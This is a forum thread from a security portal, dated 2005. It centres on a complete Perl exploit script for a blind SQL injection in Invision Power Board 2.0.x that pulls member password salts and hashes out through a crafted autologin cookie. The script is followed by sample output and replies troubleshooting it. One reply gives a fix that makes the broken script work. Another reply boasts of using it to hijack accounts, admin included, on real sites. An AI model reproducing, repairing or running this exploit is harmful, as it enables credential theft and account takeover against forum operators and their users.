Waraxe IT Security Portal
Login or Register
December 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 144
Members: 0
Total: 144
Full disclosure
Stored XSS with Filter Bypass - blogenginev3.3.8
[SYSS-2024-085]: Broadcom CA Client Automation - Improper Privilege Management (CWE-269)
[KIS-2024-07] GFI Kerio Control <= 9.4.5 Multiple HTTP Response Splitting Vulnerabilities
RansomLordNG - anti-ransomware exploit tool
APPLE-SA-12-11-2024-9 Safari 18.2
APPLE-SA-12-11-2024-8 visionOS 2.2
APPLE-SA-12-11-2024-7 tvOS 18.2
APPLE-SA-12-11-2024-6 watchOS 11.2
APPLE-SA-12-11-2024-5 macOS Ventura 13.7.2
APPLE-SA-12-11-2024-4 macOS Sonoma 14.7.2
APPLE-SA-12-11-2024-3 macOS Sequoia 15.2
APPLE-SA-12-11-2024-2 iPadOS 17.7.3
APPLE-SA-12-11-2024-1 iOS 18.2 and iPadOS 18.2
SEC Consult SA-20241211-0 :: Reflected Cross-Site Scripting in Numerix License Server Administration System Login
St. Poelten UAS | Multiple Vulnerabilities in ORing IAP
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Sql injection -> Invision Power Board SQL injection exploit by Coyl. CiaNeeD
Post new topicReply to topic View previous topic :: View next topic
Invision Power Board SQL injection exploit by Coyl. CiaNeeD
PostPosted: Sun Jul 24, 2005 6:54 pm Reply with quote
Narsil
Regular user
Regular user
Joined: Jul 20, 2005
Posts: 5




Quote:
#!/usr/bin/perl

## Invision Power Board SQL injection exploit by Coyl. CiaNeeD team.
## for stealing converge_pass_salt value from ipb database
## on some ipb forums it steals the legacy_password which is the first md5
## hash of the target password.
## vulnerable forum versions : 2.* (<2.0.4)
## tested on version 2.0.2
## * work on mysql 4.0, 4.1 versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## coded by Coyl
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## /ipb.pl 127.0.0.1 /fo/ 1
## [~] SERVER : 127.0.0.1
## [~] PATH : /fo/
## [~] MEMBER ID : 1
## [~] VALUE TO STEAL :
## [~] SEARCHING THE EASIEST WAY... [ FAILED ]
## [~] SEARCHING THE SALT [\5][ DONE ]
##
## SALT : UoU1o
##
## [~] SEARCHING THE PASS HASH [/32][ DONE ]
##
## PASS HASH : 1ab2bc1f32f231f234313444233d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 3) { &usage; }

$enum=0;
$cookie = 1;
$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$prefix = ($ARGV[3])?($ARGV[3]):("ibf_");



$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] VALUE TO STEAL : \r\n";
print "[~] SEARCHING THE EASIEST WAY... [|0]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$flag=0;
$field=1;
LOOP: while(1)
{
$pass = ($field)?('converge_pass_hash'):('converge_pass_salt');

if($field) { if(&found(96,123)==0) { &found(47,58)}}
if(!$field&&$flag) { &found(33,126) }

$char = $i;

if ($char=="0")
{
if(length($allchar) > 0){
print qq{[ DONE ]
};
if (!$flag) { print "\r\nSIMPLE PASS HASH : "; print $allchar."\r\n";}
else
{
print (($field)?("\r\n PASS HASH : "):("\r\n SALT : "));
print $allchar."\r\n\r\n";
$allchar='';
$enum=0;
$s_num=1;
$field++;
if (!($field==2)){print "[~] SEARCHING THE PASS HASH [|0]"; redo LOOP};
}
}
else
{
if (!$flag)
{
print "$back FAILED ]\r\n";
print "[~] SEARCHING THE SALT [|0]";
$flag=1;
$field=0;
redo LOOP;
}
if ($flag)
{
print "$back FAILED ]\r\n";
}
}
exit();
}
else
{ $allchar .= $char;
$enum++;
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=&crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$non="1%2527+union+select+converge_id%2Cconverge_pass_salt%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+from+".$prefix."members_converge+where+%28converge_id%3D";
$eas="1%2527+OR+%28id%3D";
$pass_hash1 = ($flag)?($non):($eas);
$pass_hash2 = "+AND+ascii%28substring%28";
$pass_hash3 = (($flag)?($pass):("legacy_password")).",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) {
return 1; }
}


return 0;
}

sub status()
{
$status = $n % 5;
if ($enum<10) {$back="\b\b\b";}
else {$back="\b\b\b\b"};
if($status==0){ print "$back\\$enum]"; }
if($status==1){ print "$back-$enum]"; }
if($status==2){ print "$back/$enum]"; }
if($status==3){ print "$back|$enum]"; }
}

sub usage()
{
print q(
Invision Power Board v 2.0.0 - 2.0.4 SQL injection exploit modified
--------------------------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [prefix-optinal]

[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id]- user id for brute
[prefix] - database prefix \(ibf_ by default\)

e.g. ipb.pl 127.0.0.1 / 1 ipb_
--------------------------------------------------------------------
coded by Coyl. CiaNeeD team.
--------------------------------------------------------------------
greets to 1dt.w0lf RST/GHC , http://rst.void.ru , http://ghc.ru
--------------------------------------------------------------------
);
exit();
}


Well it is a modification of Invision Power Board SQL injection exploit by RST/GHC posted in this forum, but with some improvements.

But i get this results, someone knows what is it? or the exploit is broken?

Quote:
[root@narsil ~]# perl ipb.pl www.--------.com / 1
[~] SERVER : www.----------.com
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]

SALT : 6790868881

[~] SEARCHING THE PASS HASH |32][ DONE ]

PASS HASH : 48555556102974852531004853501014999559950985553495555100559950485557
View user's profile Send private message
PostPosted: Mon Jul 25, 2005 4:04 am Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




interesting i get the same thing with this...perhaps one of the sploitmasters round these parts will be able to take a look at this =)

/me looks for waraxe/linix/etc
View user's profile Send private message
PostPosted: Sun Aug 14, 2005 2:51 am Reply with quote
Aelphaeis_Mangarae
Beginner
Beginner
Joined: Aug 14, 2005
Posts: 2




Quote:
But i get this results, someone knows what is it? or the exploit is broken?

Quote:
[root@narsil ~]# perl ipb.pl www.--------.com / 1
[~] SERVER : www.----------.com
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [ FAILED ]
[~] SEARCHING THE SALT [\5][ DONE ]

SALT : 6790868881

[~] SEARCHING THE PASS HASH |32][ DONE ]

PASS HASH : 48555556102974852531004853501014999559950985553495555100559950485557


I get the same thing...anyone know what is up with that?
View user's profile Send private message
PostPosted: Sat Aug 20, 2005 1:22 pm Reply with quote
Nordik
Regular user
Regular user
Joined: Aug 20, 2005
Posts: 6




u forget prefix "ipb_" after command line, lok at the example
View user's profile Send private message
PostPosted: Tue Aug 23, 2005 12:23 pm Reply with quote
Aelphaeis_Mangarae
Beginner
Beginner
Joined: Aug 14, 2005
Posts: 2




Nordik I am unsure what you are trying to say..

You mean I put like

exploit.pl host.com /folder/ 1 ipb_ ?

Would appreciate your help.
View user's profile Send private message
PostPosted: Tue Aug 23, 2005 5:30 pm Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




That doesnt work seeing as ibf_ is the default and you dont have to put that. just look at the code.

There is somthing wrong tho and I cant figure it out. Wish i could tho..
View user's profile Send private message
PostPosted: Wed Aug 24, 2005 8:04 pm Reply with quote
Colton
Regular user
Regular user
Joined: Aug 23, 2005
Posts: 5




Is this for 2.0.4 or earlier?

I tried it on a 2.0.4 board and it failed both ways.
View user's profile Send private message
PostPosted: Thu Aug 25, 2005 12:25 am Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




vulnerable forum versions : 2.* (<2.0.4)

so 2.0.0 2.0.1 2.0.2 2.0.3 otherwise it would be (<=2.0.4)

least thats how i read it. I have spent a good bit of time working on this sploit and its just flawed. I lack the skills needed to fix it Sad . Still wishing somone will fix this bad boy and share it tho.
View user's profile Send private message
PostPosted: Fri Aug 26, 2005 5:01 pm Reply with quote
Nordik
Regular user
Regular user
Joined: Aug 20, 2005
Posts: 6




ay


Last edited by Nordik on Wed Feb 18, 2009 10:13 pm; edited 1 time in total
View user's profile Send private message
error
PostPosted: Sun Sep 18, 2005 2:39 pm Reply with quote
nhtu
Beginner
Beginner
Joined: Jan 13, 2005
Posts: 2




Code:
C:\>perl ipb.pl xx.xx.xx.xx / 1 ipb_
[~] SERVER : xx.xx.xx.xx
[~] PATH : /
[~] MEMBER ID : 1
[~] VALUE TO STEAL :
[~] SEARCHING THE EASIEST WAY... [-0]Can't use an undefined value as a symbol reference at ipb.pl line 154.


why? ?[/code]
View user's profile Send private message
PostPosted: Mon Sep 19, 2005 2:38 pm Reply with quote
devn00b
Regular user
Regular user
Joined: Feb 20, 2005
Posts: 22




Because the exploit is broken and doesnt work.
View user's profile Send private message
PostPosted: Tue Sep 20, 2005 1:13 pm Reply with quote
Nordik
Regular user
Regular user
Joined: Aug 20, 2005
Posts: 6




nhtu , check the "URL"
View user's profile Send private message
PostPosted: Fri Dec 30, 2005 9:57 pm Reply with quote
paranoid
Beginner
Beginner
Joined: Dec 30, 2005
Posts: 2




To get this exploit working

Code:

else
{ $allchar .= $char;
$enum++;
}


Replace the above code with

Code:
else
{ $allchar .= chr($char);
$enum++;
}


I've been having problems with it on some of my sites, and on others it works fine, so for a while I assumed it was broken, but after playing with it a bit more, I saw that the problems everyone here was having was because part of the script is intentionally broken... anyways, there's where to patch it, enjoy.

[/code]
View user's profile Send private message
PostPosted: Thu Jan 05, 2006 6:14 pm Reply with quote
robin1200
Regular user
Regular user
Joined: Sep 13, 2005
Posts: 19




Hey..
I have been able to get any hash using this exploit, then log in with any user changing the cookie with firefox, problem is when I log in as Admin it quickly sends me back to the index with an error message" YOU ARE NOT AUTHORIZED ENTER THIS SITE", however, I am able to see PM's .

any ideas?
View user's profile Send private message
Invision Power Board SQL injection exploit by Coyl. CiaNeeD
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.048 Seconds